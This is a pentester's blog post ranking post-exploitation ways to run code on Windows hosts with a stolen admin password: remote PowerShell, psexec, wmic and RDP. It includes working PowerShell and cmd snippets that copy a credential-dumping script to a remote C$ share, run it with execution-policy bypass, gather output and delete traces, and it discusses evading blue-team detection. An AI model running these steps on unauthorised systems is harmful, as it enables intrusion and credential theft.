Code Execution (Post Exploit) Order of Operations

[quick post this month, probably lower quality than usual because I'm traveling in china and writing this on a bus]

With a cleartext windows admin password in hand, there are of course multiple ways to execute code. How do other pentesters do this? If you do it differently than I do, what’s your motivation? This isn’t rhetorical – I hope both of you who read this blog let me know :)

In general, I try not to stay too rigid. In my opinion, it’s best to mimic how real operations folks operate. That said, I do have an order of preferred ways to execute remote code. Any of these could potentially be audited as a “we’re pwned” event for a blue team, but some are inherently noisier than others.

1. Remote powershell

This seems to be the most sneaky method. First, if remote powershell is enabled, people are probably using it, so you using it may not stand out. Further, if you code without using .net fragments, nothing is written to disk at all – it’s all in memory (caveat is if you compile C# in your powershell it will write artifacts to disk). If port 5985/5986 is open, this is a good bet.

$comm = {Invoke-Portscan -Hosts 192.168.1.1/24 -SkipDiscovery -noProgressMeter -Ports 443}

$secpasswd = ConvertTo-SecureString "Password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("DOMAIN\muser", $secpasswd)
Invoke-Command -ComputerName mcomputer -Credential $mycreds -ScriptBlock $comm

2. powershell over psexec

This starts a service as system (usually), which can be noisy. Additionally, you often want to execute your own thing, which will require you to upload it to the box you’re attacking. But that said, psexec is also a common real administration method. I often find psexec already installed on many utility boxes. If port 445 is open, this is usually the method I try next – uploading a powershell script to the server and then executing it with psexec.

#powershell over psexec
#psexec has the -c option for copying executables, but doesn't work with scripts like this as well
#(because powershell.exe is the executable)

$servername = "192.168.137.100"
$username = "192.168.137.100\Administrator"
$password = "password"

$LocalOutFile = "out.txt"
$LocalPS = "mim.ps1"

$psFile = "10982124.ps1"


net use q: \\$servername\c$\Windows\Temp /user:$username $password | Out-Null
copy $LocalPS q:\$psFile
& cmd /c echo "." | psexec.exe /accepteula -u $username -p $password \\$servername powershell -executionpolicy bypass c:\Windows\Temp\$psFile >> "out.txt" 2>&1

del q:\$psFile
net use q: /delete | Out-Null

3. powershell over wmic

Even if you’re an admin on the box and you can reach port 445, psexec can be effectively disabled, for example if the ADMIN$ share is not set (i.e. you can see this access denied when admin$ is requested in a packet dump, and you can also see it in the registry at HKLM:Software\MicroSoft\Windows\CurrentVerision\Policies\System\LocalAccountTokenFilterPolicy). Anyway, if psexec and remote powershell both aren’t options, wmic has always come through for me.

$servername = "192.168.137.100"
$username = "192.168.137.100\Administrator"
$password = "password"
$LocalOutFile = "out.txt"
$LocalPS = "mim.ps1"
$psFile = "10982124.ps1"
$outFile = "99120997.nss"

#copy .ps1 to the remote server
net use q: \\$servername\c$\Windows\Temp /user:$username $password | Out-Null
copy $LocalPS q:\$psFile

#redirect output to a file on the remote server
wmic /user:$username /password:$password /node:$servername PROCESS call create "powershell -executionpolicy bypass c:\Windows\Temp\$psFile >> c:\Windows\Temp\$outFile"

#wait for execution to finish
sleep 30

#copy output back and cleanup
del q:\$psFile
copy q:\$outfile out.txt
del q:\$outFile
net use q: /delete | Out-Null

4. RDP

I’ve never HAD to use RDP, and it’s super noisy, but some things are easier with a desktop. I usually try to avoid this if I can, but especially if remote powershell isn’t enabled and 3389 is open, I’ll sometimes just go straight for RDP.

In addition to the four methods I mention above (remote ps, psexec, wmic, and RDP) there are a few other ways, at least including AT, dropping files in specific places, etc. But I can almost always get the code execution I want with above.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 33 other followers